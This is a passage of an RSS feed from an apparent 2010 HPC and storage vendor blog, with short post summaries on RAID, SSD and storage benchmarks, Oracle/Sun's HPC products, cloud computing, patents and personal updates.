      <description>[zUPDATE]: zOMG its like &amp;hellip; ya know &amp;hellip; I made a typo and hit the wrong load &amp;hellip;. nodmraid works fine (along with some brokenmodule=&amp;hellip; magic). As Emily Litella would say, never mind.
 This one is (again) causing me to pull some of my rapidly disappearing hair out of my head. We don&amp;rsquo;t do fakeRAID. For many reasons. We have a vanishingly small interest in dm*. We want to turn it off.</description>
    </item>
    
    <item>
      <title>Did distributed memory really win?</title>
      <link>https://blog.scalability.org/2010/08/did-distributed-memory-really-win-2/</link>
      <pubDate>Thu, 12 Aug 2010 04:46:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/did-distributed-memory-really-win-2/</guid>
      <description>If you asked me years ago, I would have said, yes, of course it did. Now I am having second thoughts. Our processors have 4, 6, 8, 12 cores, and soon more like 16 and up. All sharing a set of pipes to RAM. Programming these can be done either with a distributed memory interface like MPI, or a much simpler interface like OpenMP. Vector processors ala GPU, Knights Ferry/Bridge are coming out which are little more than massive numbers of PEs and shared memory.</description>
    </item>
    
    <item>
      <title>Evolution of clouds in HPC</title>
      <link>https://blog.scalability.org/2010/08/evolution-of-clouds-in-hpc/</link>
      <pubDate>Thu, 12 Aug 2010 04:41:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/evolution-of-clouds-in-hpc/</guid>
      <description>I argue that clouds are v3.0 of the original idea, ASP. ASP provided a remote hardware/software environment to run your apps. It didn&amp;rsquo;t have the benefit of virtualization, standard stacks like LAMP, etc. Plus it had high costs to get started. It was destined/doomed to fail. ASP v2.0 came about with &amp;ldquo;grids&amp;rdquo;. They were the buzzword for a while, and sought to provide a &amp;ldquo;utility computing&amp;rdquo; (remember that) model? Provide a platform, make access easy, and they will come.</description>
    </item>
    
    <item>
      <title>RAID is not a backup, number 987342 in a series ...</title>
      <link>https://blog.scalability.org/2010/08/raid-is-not-a-backup-number-987342-in-a-series/</link>
      <pubDate>Thu, 12 Aug 2010 04:29:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/raid-is-not-a-backup-number-987342-in-a-series/</guid>
      <description>Ok, raise your hand if you are using RAID as a backup. No, seriously. Those with your hands up &amp;hellip; have you ever lost data? Want to? Keep using RAID as a backup. I don&amp;rsquo;t mean disk to disk backup. I mean not using a backup when you have a RAID. The RAID is your backup. What is the cost to replace all the material you have created over time stored on that RAID?</description>
    </item>
    
    <item>
      <title>Ahh ... the joy of business ...</title>
      <link>https://blog.scalability.org/2010/08/ahh-the-joy-of-business/</link>
      <pubDate>Wed, 11 Aug 2010 20:01:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/ahh-the-joy-of-business/</guid>
      <description>I like what we do, we are pretty good at it. Every now and then though, we have some &amp;hellip;er &amp;hellip; more interesting moments. Have a customer now who, for the past several invoices, has required us to engage legal counsel to get them to pay. This is ridiculous &amp;hellip; I&amp;rsquo;ve thought of naming and shaming them, but its not worth it. Firing them as a customer is what the business books recommend.</description>
    </item>
    
    <item>
      <title>It looks like people are starting to get it ...</title>
      <link>https://blog.scalability.org/2010/08/it-looks-like-people-are-starting-to-get-it/</link>
      <pubDate>Tue, 10 Aug 2010 02:12:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/it-looks-like-people-are-starting-to-get-it/</guid>
      <description>I&amp;rsquo;ve been a strong proponent of real security &amp;hellip; not security theatre &amp;hellip; since I saw what crackers will do to unwitting customers. Most of the exploits I&amp;rsquo;ve seen over the past several years has been due to a very weak point of entry, coupled with some keylogger technology. I&amp;rsquo;ve watched otherwise secure Linux clusters be compromised easily, when a grad student running windows happily typed the root password sshing in.</description>
    </item>
    
    <item>
      <title>How you can tell the universe is conspiring against you</title>
      <link>https://blog.scalability.org/2010/08/how-you-can-tell-the-universe-is-conspiring-against-you/</link>
      <pubDate>Sat, 07 Aug 2010 12:39:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/how-you-can-tell-the-universe-is-conspiring-against-you/</guid>
      <description>A few weeks ago, I had a meeting in Chicago. Well, I would have had the meeting, had I not had a really bad kidney stone attack that week. Won&amp;rsquo;t get into that, other than to note that it hurt badly, and I wound up in a hospital and ER for ~3.5 days. Released that thursday, I had been scheduled to drive to Chicago that night. Given how saturated I was with pain meds, I didn&amp;rsquo;t think this was the wisest of ideas.</description>
    </item>
    
    <item>
      <title>Oracle/Sun&#39;s HPC goes away ...</title>
      <link>https://blog.scalability.org/2010/08/oraclesuns-hpc-goes-away/</link>
      <pubDate>Fri, 06 Aug 2010 01:31:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/oraclesuns-hpc-goes-away/</guid>
      <description>You knew something like this could happen &amp;hellip; but probably, like most others, you never thought it really would. Unfortunately,it appears to have happened. The technologies in Oracle&amp;rsquo;s HPC quiver include SGE (aka GridEngine), Lustre, and several others. Lustre really doesn&amp;rsquo;t have use cases outside of HPC storage. The SGE product largely doesn&amp;rsquo;t have use cases outside of HPC (though you could use it in some fairly creative ways).
We have customers with business dependencies on SGE.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2010-08-05</title>
      <link>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-05/</link>
      <pubDate>Thu, 05 Aug 2010 12:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/twitter-updates-for-2010-08-05/</guid>
      <description>* Congrats @[RickForMI](http://twitter.com/RickForMI) on your win. Let us know how we can help! [#](http://twitter.com/sijoe/statuses/20308293872) * @[Obdurodon](http://twitter.com/Obdurodon) seen that a bit with (insert your favorite distribution here). Need to promote the concept that a distro is an instance of linux [in reply to Obdurodon](http://twitter.com/Obdurodon/statuses/20312247237) [#](http://twitter.com/sijoe/statuses/20317313478) * @[herrold](http://twitter.com/herrold) Have seen lots of folks thinking that our time/effort/materials were free because the software was. [in reply to herrold](http://twitter.com/herrold/statuses/20316475702) [#](http://twitter.com/sijoe/statuses/20317379240)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>This day has been exhausting and exhilarating</title>
      <link>https://blog.scalability.org/2010/08/this-day-has-been-exhausting-and-exhilarating/</link>
      <pubDate>Wed, 04 Aug 2010 21:30:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/this-day-has-been-exhausting-and-exhilarating/</guid>
      <description>I can&amp;rsquo;t say why just yet. Lets see if anything comes of it, I certainly hope so. Spent &amp;hellip; I dunno &amp;hellip; most of the day &amp;hellip; in meetings or on the phone. Good stuff is a-brewing. Good stuff.</description>
    </item>
    
    <item>
      <title>OT: Michigan has a computer guy running for governer</title>
      <link>https://blog.scalability.org/2010/08/ot-michigan-has-a-computer-guy-running-for-governer/</link>
      <pubDate>Wed, 04 Aug 2010 01:58:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/ot-michigan-has-a-computer-guy-running-for-governer/</guid>
      <description>&amp;hellip; and it looks like he just won his primary. I am not normally one for discussing much politics here, I&amp;rsquo;ll keep that to a minimum. Rick Snyder is a former Gateway exec, and has been a VC in the Ann Arbor area. I&amp;rsquo;ve never met him personally, but have heard nothing but good things from people whom have met him. Our daughters attended the same school, and will again next school year.</description>
    </item>
    
    <item>
      <title>Interesting SSD results with a late model kernel</title>
      <link>https://blog.scalability.org/2010/08/interesting-ssd-results-with-a-late-model-kernel/</link>
      <pubDate>Mon, 02 Aug 2010 19:57:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/08/interesting-ssd-results-with-a-late-model-kernel/</guid>
      <description>Basic MD raid0, xfs file system, 2 SSD Intel drives (X25-e). There are quite a few benchmarketing numbers out there, and no, I won&amp;rsquo;t regurgitate them. Or believe them for that matter. Just built a testing kernel out of 2.6.35, installed it on a test machine, and I wanted to see the impact on random reads/writes of a few of the changes to xfs and others. From our (otherwise excellent) 2.</description>
    </item>
    
    <item>
      <title>As of 1-August-2010 ... two important milestones have been reached</title>
      <link>https://blog.scalability.org/2010/07/as-of-1-august-2010-two-important-milestones-have-been-reached/</link>
      <pubDate>Sat, 31 Jul 2010 02:06:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/as-of-1-august-2010-two-important-milestones-have-been-reached/</guid>
      <description>First, and most important &amp;hellip; my 19th wedding anniversary. Woot! I&amp;rsquo;m a lucky guy, and I know it! Second, and very important for the day job front, we&amp;rsquo;ve been in business 8 years &amp;hellip; self bootstrapped, profitable, and growing. This is not to say we don&amp;rsquo;t need capital, but we are a business first, and making a loss is not something we can sustain for very long, as we fund our operations from our cash flow.</description>
    </item>
    
    <item>
      <title>Almost, but not quite ...</title>
      <link>https://blog.scalability.org/2010/07/almost-but-not-quite-2/</link>
      <pubDate>Sat, 31 Jul 2010 01:49:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/almost-but-not-quite-2/</guid>
      <description>Matt Asay has an interesting article at The Register. In it, he argues that Microsoft needs to adapt to the world that has evolved around it, and do something drastic. This article references a Wall Street Journal article/post on the state of Microsoft and the lack of motion of its share price over the last decade. In the quoted WSJ article, Matt points to a paragraph that I&amp;rsquo;ll repeat here:</description>
    </item>
    
    <item>
      <title>mpiBLAST test RPMs for 1.6.0 available</title>
      <link>https://blog.scalability.org/2010/07/mpiblast-test-rpms-for-1-6-0-available/</link>
      <pubDate>Sat, 31 Jul 2010 01:03:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/mpiblast-test-rpms-for-1-6-0-available/</guid>
      <description>See here. These are in testing, so please report any bugs/errors. mpiBLAST is of course is one of the original cluster-accelerated BLAST implementations, being developed by Wu Feng&amp;rsquo;s group at VT. IMO there is a strong need for applications like this, as well as mpihmmer and others. As data set sizes continue to grow at exponential paces, we need tools that can scale to the need. mpiBLAST is definitely in this set of tools &amp;hellip; being an enabling technology to perform analyses at scale, that might not be possible without it.</description>
    </item>
    
    <item>
      <title>A view of Bluearc ... and to a degree, a fair number of storage companies</title>
      <link>https://blog.scalability.org/2010/07/a-view-of-bluearc-and-to-a-degree-a-fair-number-of-storage-companies/</link>
      <pubDate>Sat, 31 Jul 2010 00:54:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/a-view-of-bluearc-and-to-a-degree-a-fair-number-of-storage-companies/</guid>
      <description>At The Register, Chris Mellor has an interesting article on Bluearc. In it he notes that they just raised a new series of capital
Seven rounds. Total capital input is $225M USD. For a VC to be really interested, they need to see some serious multiplicative effects of this investment. Assume that they can exit at 10x valuation &amp;hellip; assume that for $20M they sold 50-ish percent of the company. VC&amp;rsquo;s typically want in the 33-50% region, and the money is expensive.</description>
    </item>
    
    <item>
      <title>Unifying the JackRabbit and DeltaV baseline loads</title>
      <link>https://blog.scalability.org/2010/07/unifying-the-jackrabbit-and-deltav-baseline-loads/</link>
      <pubDate>Tue, 27 Jul 2010 04:48:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/unifying-the-jackrabbit-and-deltav-baseline-loads/</guid>
      <description>For a while, we&amp;rsquo;ve used Ubuntu 8.04 as the baseline distribution for DeltaV. In the earlier days, it was easier to get some aspects of the load working, as we had a modern kernel and userspace to work from. Ubuntu 10.04 has come out, and I am not sure I like it as much. It has some good features, but Canonical has been pushing Ubuntu into some not so great directions as of late, IMO.</description>
    </item>
    
    <item>
      <title>The day job laptop</title>
      <link>https://blog.scalability.org/2010/07/the-day-job-laptop/</link>
      <pubDate>Mon, 26 Jul 2010 20:09:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/the-day-job-laptop/</guid>
      <description>&amp;hellip; died. Display randomly quits. Just weeks after the warranty expired. Ugh. Spec&amp;rsquo;s for new one: 8+ GB RAM, quad core Intel, Nvidia graphics. So far, Dell has a 4500 workstation that looks good, and HP has a multimedia laptop that looks good. Anyone else I should look at? Need to run Linux, Windows 7. Mostly Linux. 64 bit. Long battery life (3+ hours) would be nice, this is what I have today.</description>
    </item>
    
    <item>
      <title>... and another Solaris OEM agreement bites the dust ...</title>
      <link>https://blog.scalability.org/2010/07/and-another-solaris-oem-agreement-bites-the-dust/</link>
      <pubDate>Mon, 26 Jul 2010 17:59:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/and-another-solaris-oem-agreement-bites-the-dust/</guid>
      <description>(with apologies to Queen) Looks like Oracle/IBM have parted ways on Solaris. None of this bodes well for Solaris market share. If Oracle wants a private OS to run for Oracle&amp;rsquo;s apps, to compel people to buy its hardware/OS to run, then, well, it might pursue a strategy like this. Or maybe IBM demanded onerous terms. Or &amp;hellip; Ok, we don&amp;rsquo;t know. But that agreement is coming to an end. Which suggests that Oracle isn&amp;rsquo;t interested in saving it.</description>
    </item>
    
    <item>
      <title>So what do we do when our software RAID is faster than their hardware RAID?</title>
      <link>https://blog.scalability.org/2010/07/so-what-do-we-do-when-our-software-raid-is-faster-than-their-hardware-raid/</link>
      <pubDate>Mon, 26 Jul 2010 13:56:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/so-what-do-we-do-when-our-software-raid-is-faster-than-their-hardware-raid/</guid>
      <description>Results from our baseline tests of our Delta-V unit is showing a sustained write speed north of 850 MB/s, and a sustained read speed north of 1 GB/s. I compare these numbers to some of our competitiors systems, and note that these are a bit higher than what we have seen reported from them in realistic configurations. These systems are slated to be iSCSI targets for the customer who bought them.</description>
    </item>
    
    <item>
      <title>DV4 tuned ...</title>
      <link>https://blog.scalability.org/2010/07/dv4-tuned/</link>
      <pubDate>Mon, 26 Jul 2010 03:19:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/dv4-tuned/</guid>
      <description>spent the weekend working on our DeltaV 4 unit, tuning it a bit. Previous write numbers were a bit lower than I liked. So we adjusted some of the configuration a little. This is what resulted (old write numbers were in the 450MB/s region for this test)
Run status group 0 (all jobs): WRITE: io=31,748MB, aggrb=788MB/s, minb=807MB/s, maxb=807MB/s, mint=40264msec, maxt=40264msec  This is way outside system cache. Its also faster than many of the hardware raid vendors machines in this size class, and far more cost effective.</description>
    </item>
    
    <item>
      <title>In a world of vector and intrinsically parallel machines ...</title>
      <link>https://blog.scalability.org/2010/07/in-a-world-of-vector-and-intrinsically-parallel-machines/</link>
      <pubDate>Sun, 25 Jul 2010 16:40:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/in-a-world-of-vector-and-intrinsically-parallel-machines/</guid>
      <description>&amp;hellip; why are we still programming them with serial languages? And more to the point, why are these language compilers so terrible at converting serial code to parallel code? No, seriously &amp;hellip; I know there are several constraints on the semantics of the serial language code processing. Debugging and exceptions for one &amp;hellip; you wouldn&amp;rsquo;t want to signal a floating point exception in code that had nothing to do with the FPE in the first place.</description>
    </item>
    
    <item>
      <title>Conservative?  Me?  Nah ...</title>
      <link>https://blog.scalability.org/2010/07/conservative-me-nah/</link>
      <pubDate>Sun, 25 Jul 2010 05:46:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/conservative-me-nah/</guid>
      <description>Ok, well, maybe. This is about text editors, not political affiliations by the way. I&amp;rsquo;ve been using nedit for a while. I had just switched to it when I started working on my thesis &amp;hellip; er &amp;hellip; a while ago. It was nice, as the same editor worked nicely on Irix and OS/2. My thesis was written in TeX (and yes, it was assembled with a Makefile), nedit was a great editor for this &amp;hellip; It was a terrific editor for Fortran programming, and not bad for C, Perl, C++, &amp;hellip; But &amp;hellip; as with all things &amp;hellip; it is showing its age.</description>
    </item>
    
    <item>
      <title>OT: The joy that are kidney stones</title>
      <link>https://blog.scalability.org/2010/07/ot-the-joy-that-are-kidney-stones/</link>
      <pubDate>Fri, 23 Jul 2010 09:30:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/ot-the-joy-that-are-kidney-stones/</guid>
      <description>No &amp;hellip; seriously &amp;hellip; not. I spent the 2.5 of the last 4 days in hospital, and yesterday, had to go to the ER to deal with complications and some fairly incredible amounts of pain. I had to postpone phone calls, a trip to Chicago, etc. Not happy about this. And in the course of this, I learned I had yet another stone on the right. Let me reiterate. Toradol is your friend if you are in this way.</description>
    </item>
    
    <item>
      <title>On the test track with a new Delta-V</title>
      <link>https://blog.scalability.org/2010/07/on-the-test-track-with-a-new-delta-v/</link>
      <pubDate>Fri, 23 Jul 2010 08:44:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/on-the-test-track-with-a-new-delta-v/</guid>
      <description>At the day job, we have another to finish building today, and then build the RAID. This is the 3rd unit of the new generation of Delta-V&amp;rsquo;s, and they are generally showing better overall performance than the older versions. Delta-V&amp;rsquo;s are cost optimized storage platforms, suitable for block and file storage targets, as well as very cost effective cluster storage platforms. You do need good performance on your storage devices &amp;hellip; especially as the size of storage grows.</description>
    </item>
    
    <item>
      <title>OT: round four of kidney stones</title>
      <link>https://blog.scalability.org/2010/07/ot-round-four-of-kidney-stones/</link>
      <pubDate>Tue, 20 Jul 2010 14:45:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/ot-round-four-of-kidney-stones/</guid>
      <description>i&amp;rsquo;d like to file a bug report on my biochemistry &amp;hellip; There is something not quite right about getting another stone so quickly Well at least I know what happens next. If you are ever in this situation yourself remember Toradol is your friend. Well hopefully this one will go easier than the previous.</description>
    </item>
    
    <item>
      <title>Thoughts on SSDs, spinning rust, ...</title>
      <link>https://blog.scalability.org/2010/07/thoughts-on-ssds-spinning-rust/</link>
      <pubDate>Mon, 19 Jul 2010 14:39:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/thoughts-on-ssds-spinning-rust/</guid>
      <description>So SSDs are upon us with a vengeance. No one is actively predicting the death of spinning rust &amp;hellip; yet. But its in the back of many folks minds, even if they aren&amp;rsquo;t saying it now. Similar to the death of tape. Yeah, I know, its still around. Call that the long tail. Sequential storage mechanisms are going the way of the dodo bird. The issues everyone worries about are cost per data volume, and speed of access/recovery, not to mention longevity.</description>
    </item>
    
    <item>
      <title>OT: The day job documentation site is up, with content being added</title>
      <link>https://blog.scalability.org/2010/07/ot-the-day-job-documentation-site-is-up-with-content-being-added/</link>
      <pubDate>Fri, 16 Jul 2010 16:21:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/ot-the-day-job-documentation-site-is-up-with-content-being-added/</guid>
      <description>There is a back story on this. Basically writing documentation takes a while, and when it changes, you have to update many things. I personally find this task painful &amp;hellip; in the sense of its hard to make small changes the way most documentation works. In addition, for years, we&amp;rsquo;ve been wanting to go &amp;ldquo;all electronic&amp;rdquo;. Paper and printed documentation gets lost or destroyed, you have to regenerate it &amp;hellip; and oh, as noted above, its hard to make small changes.</description>
    </item>
    
    <item>
      <title>... and projects have to figure out their future ...</title>
      <link>https://blog.scalability.org/2010/07/and-projects-have-to-figure-out-their-future/</link>
      <pubDate>Tue, 13 Jul 2010 19:46:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/and-projects-have-to-figure-out-their-future/</guid>
      <description>OpenSolaris future is very much in doubt. There is a shelf life on this product, it expires 16-August-2010, unless Oracle decides to communicate actively with the project. I had suggested this previously, that OpenSolaris is likely under serious review by Oracle. What possible business model could they have for OpenSolaris to be accretive to Oracle&amp;rsquo;s bottom line, when they give it away, and others get support revenue from it? Well there are several possible, but they involve some changes to licensing, and support models.</description>
    </item>
    
    <item>
      <title>As the market changes ...</title>
      <link>https://blog.scalability.org/2010/07/as-the-market-changes-2/</link>
      <pubDate>Tue, 13 Jul 2010 19:24:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/as-the-market-changes-2/</guid>
      <description>As noted in the previous post, the EC2 CC1 bit is likely to be game changing for commercial users. The market is undergoing one of its transformations, but I am seeing two different, actually complementary trends, occurring at the same time. When these changes have happened in the past, a process of creative destruction has occurred. That is, something old was destroyed, and in the process, something new flourished. The changes driving this market in the past has been the cost per computing cycle, and the up-front purchase/lease costs.</description>
    </item>
    
    <item>
      <title>This could be game changing for lots of users</title>
      <link>https://blog.scalability.org/2010/07/this-could-be-game-changing-for-lots-of-users/</link>
      <pubDate>Tue, 13 Jul 2010 12:30:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/this-could-be-game-changing-for-lots-of-users/</guid>
      <description>Amazon announced the EC2 availability for HPC users. As per the article on InsideHPC, previous incarnations of EC2 didn&amp;rsquo;t really work well for low latency jobs or large runs. They still have a storage issue (e.g. storage performance and parallel IO), that we&amp;rsquo;d be happy to help with. Why is this potentially game changing for the market? A number of reasons.
You can exploit a complete pay-as-you-go view for whatever you want to boot up (minus accelerators).</description>
    </item>
    
    <item>
      <title>Ok ... this one makes you think ... did they really want to do that?</title>
      <link>https://blog.scalability.org/2010/07/ok-this-one-makes-you-think-did-they-really-want-to-do-that/</link>
      <pubDate>Thu, 08 Jul 2010 13:15:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/ok-this-one-makes-you-think-did-they-really-want-to-do-that/</guid>
      <description>The US Cyber command, a new &amp;hellip; er &amp;hellip; entity in the US that, er &amp;hellip; will protect us &amp;hellip; somehow &amp;hellip; has an interesting seal. On that seal is a &amp;ldquo;cipher&amp;rdquo; of some sort. Well that &amp;ldquo;cipher&amp;rdquo;, 9ec4c12949a4f31474f299058ce2b22a appears around the inner ring of the seal. Wired noticed this and had a contest to de-cipher it. The Register noticed this, and, as all deep techies might say, ya know, it looks a heckuva lot like an md5 hash of something.</description>
    </item>
    
    <item>
      <title>Using ZFS in your storage considered harmful ... without a license from NetApp ...</title>
      <link>https://blog.scalability.org/2010/07/using-zfs-in-your-storage-considered-harmful-without-a-license-from-netapp/</link>
      <pubDate>Wed, 07 Jul 2010 12:08:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/using-zfs-in-your-storage-considered-harmful-without-a-license-from-netapp/</guid>
      <description>Chalk this up to &amp;ldquo;you knew this would happen&amp;rdquo;. NetApp is going after ZFS storage vendors, folks who use ZFS in their products, as infringing upon NetApp patents. Yes Virginia, this includes open source vendors.
Anyone wanna take bets as to whether or not the license fees will be &amp;ldquo;set low&amp;rdquo;? I have my doubts. ZFS directly impacts NetApp&amp;rsquo;s business model. It is unlikely that they will use RAND pricing. Well &amp;hellip; their version of &amp;ldquo;reasonable&amp;rdquo; may not mean the same thing as others version of &amp;ldquo;reasonable&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>approaching 1% penetration into top 500</title>
      <link>https://blog.scalability.org/2010/07/approaching-1-penetration-into-top-500/</link>
      <pubDate>Wed, 07 Jul 2010 07:09:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/approaching-1-penetration-into-top-500/</guid>
      <description>I know &amp;hellip; I know &amp;hellip; 1% isn&amp;rsquo;t much of the top500. But its progress. This is for siCluster storage clusters &amp;hellip; not the computing cluster portion. None in the top 10, but we are working on it.</description>
    </item>
    
    <item>
      <title>... and turns off their cloud storage bits ...</title>
      <link>https://blog.scalability.org/2010/07/and-turns-off-their-cloud-storage-bits/</link>
      <pubDate>Wed, 07 Jul 2010 00:04:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/and-turns-off-their-cloud-storage-bits/</guid>
      <description>EMC is &amp;hellip; um &amp;hellip; gently nudging &amp;hellip; with great force &amp;hellip; customers off of atmos. One of the points we talk about with our customers is the concept of freedom from bricking in a physical sense. That is, our hardware and software stack will let you keep on using it and having it supported and supportable, even if we decide to turn the company into something unrelated to HPC and storage.</description>
    </item>
    
    <item>
      <title>EMC gobbles Greenplum</title>
      <link>https://blog.scalability.org/2010/07/emc-gobbles-greenplum/</link>
      <pubDate>Tue, 06 Jul 2010 23:54:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/emc-gobbles-greenplum/</guid>
      <description>While EMC is not really an HPC player in a significant sense, business analytics and informatics is definitely an HPC process. Greenplum has a modified version of Postgresql that is parallelized quite well. And they have been using it to target specific market segments inhabited by Teradata and others. So along comes EMC and snaps them up. There are probably several good and interesting reasons for this. One that hasn&amp;rsquo;t escaped me is that EMC sees many of its partners in the world creating vertically integrated offerings.</description>
    </item>
    
    <item>
      <title>Happy 4th of July</title>
      <link>https://blog.scalability.org/2010/07/happy-4th-of-july/</link>
      <pubDate>Sun, 04 Jul 2010 19:07:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/happy-4th-of-july/</guid>
      <description>For our readers outside the US, the 4th of July is our Independence day. It has become terribly commercialized. Its meaning has been subjugated to other imperatives. I personally find this sad, as the freedoms we enjoy here in the US are sadly not enjoyed everywhere &amp;hellip; and the meaning of this day in our history is being diluted. Our freedoms come at a cost, sometimes a terrible one. We ought to remember this on our day of independence.</description>
    </item>
    
    <item>
      <title>OT: Hilarious ...</title>
      <link>https://blog.scalability.org/2010/07/ot-hilarious/</link>
      <pubDate>Sat, 03 Jul 2010 11:10:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/ot-hilarious/</guid>
      <description>link to original
See more funny videos and funny pictures at CollegeHumor.</description>
    </item>
    
    <item>
      <title>This is going to leave a mark ... looks like there is an HPC component as well ...</title>
      <link>https://blog.scalability.org/2010/07/this-is-going-to-leave-a-mark-looks-like-there-is-an-hpc-component-as-well/</link>
      <pubDate>Fri, 02 Jul 2010 11:27:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/this-is-going-to-leave-a-mark-looks-like-there-is-an-hpc-component-as-well/</guid>
      <description>I saw this a few days ago and ignored it at first. Vendor bashing pieces are nothing new from the media. To paraphrase Mark Twain: Rumors of Dell&amp;rsquo;s demise are greatly exaggerated. Dell is, and continues to be a powerhouse at pushing machines out. Their innovation is, basically customized machines in volume. There is no magic in their machines, they use the same parts from the same sources as others do.</description>
    </item>
    
    <item>
      <title>On the test track with a new model JackRabbit</title>
      <link>https://blog.scalability.org/2010/07/on-the-test-track-with-a-new-model-jackrabbit/</link>
      <pubDate>Fri, 02 Jul 2010 08:56:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/07/on-the-test-track-with-a-new-model-jackrabbit/</guid>
      <description>This is going out to a customer in about a week, though we have a little time to run tests. Tuning these units is like tuning an engine &amp;hellip; and you like to tweak and tune, you eventually learn where the parameters of this engine, from tuning, hit good efficiency. You get a feel for it. You tune one parameter, the vibration pattern changes slightly. You tune another parameter, you get another overtone.</description>
    </item>
    
    <item>
      <title>Do the heroic class systems provide a benefit to their vendors in terms of follow on sales?</title>
      <link>https://blog.scalability.org/2010/06/do-the-heroic-class-systems-provide-a-benefit-to-their-vendors-in-terms-of-follow-on-sales/</link>
      <pubDate>Wed, 30 Jun 2010 23:18:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/do-the-heroic-class-systems-provide-a-benefit-to-their-vendors-in-terms-of-follow-on-sales/</guid>
      <description>This discussion erupted on the beowulf list today. I responded to a question on this, pointing out that prestige adds nothing to the bottom line. What matters is, not so curiously, the bottom line. One author disagreed with me. His point was that prestige class systems translated into sales for the relevant vendors. I think his examples were stretches, and not applicable to HPC. All of the public (and private) responses I have seen seem to support my thesis on this.</description>
    </item>
    
    <item>
      <title>I am slowly coming to the realization ...</title>
      <link>https://blog.scalability.org/2010/06/i-am-slowly-coming-to-the-realization/</link>
      <pubDate>Wed, 30 Jun 2010 15:53:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/i-am-slowly-coming-to-the-realization/</guid>
      <description>that basic systems management and configuration are neither well known nor well understood, by the vast majority of people. Even the ones with certifications who should know this stuff. This is leading me to rethink some of the basic elements of the out-of-box experience. Part of this is driven by the tendency of certain distributions to remap, effectively randomly, their network port assignments. This is never, under any circumstances, a good thing.</description>
    </item>
    
    <item>
      <title>siCluster in action (blinken-blue-lights)</title>
      <link>https://blog.scalability.org/2010/06/sicluster-in-action-blinken-blue-lights/</link>
      <pubDate>Sun, 27 Jun 2010 15:37:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/sicluster-in-action-blinken-blue-lights/</guid>
      <description>Running some burn-in testing as I remember (older video) &amp;hellip; [FLOWPLAYER=/wp-content/videos/siCluster_in_action.flv,320,200] You can just feel the bits-a-flowing &amp;hellip; paraphrasing Apocalypse Now &amp;ldquo;I love the smell of many GB/s in the morning &amp;hellip;&amp;rdquo;</description>
    </item>
    
    <item>
      <title>Hmm ... patenting a market process ....</title>
      <link>https://blog.scalability.org/2010/06/hmm-patenting-a-market-process/</link>
      <pubDate>Sat, 26 Jun 2010 20:35:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/hmm-patenting-a-market-process/</guid>
      <description>/. linked to a newly granted patent by Amazon. I am all for good patents, but given the number of &amp;hellip; er &amp;hellip; not so good ones I&amp;rsquo;ve read through, as well as obvious rehashing of existing work &amp;hellip; I don&amp;rsquo;t know what to make of this one. This seems &amp;hellip; well &amp;hellip; like patenting any instance of a market exchanging money for computer time and/or storage, based upon a pricing model determined by past histories or current demand/availability.</description>
    </item>
    
    <item>
      <title>RAID is not backup ... really ...</title>
      <link>https://blog.scalability.org/2010/06/raid-is-not-backup-really/</link>
      <pubDate>Mon, 21 Jun 2010 11:38:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/raid-is-not-backup-really/</guid>
      <description>A customer with a RAID6 and RAID1 OS drive just had what amounts to an epic failure. 4 drives gone. These are pretty good drives, not a known bad batch. Data points to environmental issues (heat). They don&amp;rsquo;t understand it, given the nice AC in there, but looking at the drives, a number of them were warm. We have fans doing a pull across the drives, they shouldn&amp;rsquo;t have been as warm as they were.</description>
    </item>
    
    <item>
      <title>You&#39;ve been comcasted!</title>
      <link>https://blog.scalability.org/2010/06/youve-been-comcasted/</link>
      <pubDate>Sun, 20 Jun 2010 21:07:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/06/youve-been-comcasted/</guid>
